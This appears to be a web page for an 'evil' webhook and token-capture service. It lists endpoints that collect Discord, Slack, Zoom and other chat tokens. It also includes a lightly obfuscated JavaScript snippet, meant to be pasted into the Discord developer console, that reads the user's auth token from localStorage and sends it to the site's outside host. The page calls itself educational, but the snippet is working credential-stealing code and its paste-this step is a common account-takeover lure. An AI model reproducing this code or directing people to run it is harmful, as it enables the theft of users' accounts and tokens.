
To view what ever we "stole/triggered" on, check out your personal view. - https://evil.thugs.red/view/0bae2c06784fc7fbb1565b0a6fa04b13577b114180f2b751ced4274728771907 You can call the following url for simple webhook trigger. Anything you add for request arguments will be sent to the webhook. - https://evil.thugs.red/hook/b1572c92
You can call the following url for simple token stealer. Anything you add for request arguments will be sent to the webhook. - https://evil.thugs.red/token/{secret-token-string}?type=0&uid=b1572c92
Token types: 0=Unknown, 1=Discord, 2=Slack,3=Zoom, 4=MSTeams, 5=WebEx, 6=GoogleHangout, 7=Jitsi Setting a token type, will automatically forward to the correct site. If unsure, leave out. PS. This hash is based on your IP address and a salt, so only you can view it. But it should group thing together quite nicely as long as you come from the same ip. Site data visibility and retention Webhook logs are shown for 6 hours. (Unless forcefully deleted) Token logs are shown for 1 hours. (Unless forcefully deleted) All data is wiped from DB every 48 hours. Access logs are wiped from system every 120 hours. Disclaimer We are not responsible for any damage or harm done by using this site. This is for educational use only. Also the reason why the domain name has the word "evil" in it is to make it pop in logs/siems etc. What ever comes from this site should be considered untrusted.

Evil things to test and understand how they work...

Discord Token Grab - The console way

In Discord, access the developer console/Or if you are in a browser hit F12 and copy paste the following into the console and hit enter... Once it's done, you can find your token from that Client in the private view.
function discordTokenTest(){window['location']['href']='https://discord.com/app';if(window['location']['href']=='https://discord.com/app'||window['location']['href']=='https://discord.com/channels/@me'){var _v1=document['body']['appendChild'](document['createElement']`iframe`)['contentWindow']['localStorage']['token'];let _v2=_v1['replace'](/"/g,'');window['location']['href']='https://evil.thugs.red/token/'+_v2+'?type=1&uid=b1572c92';}};discordTokenTest();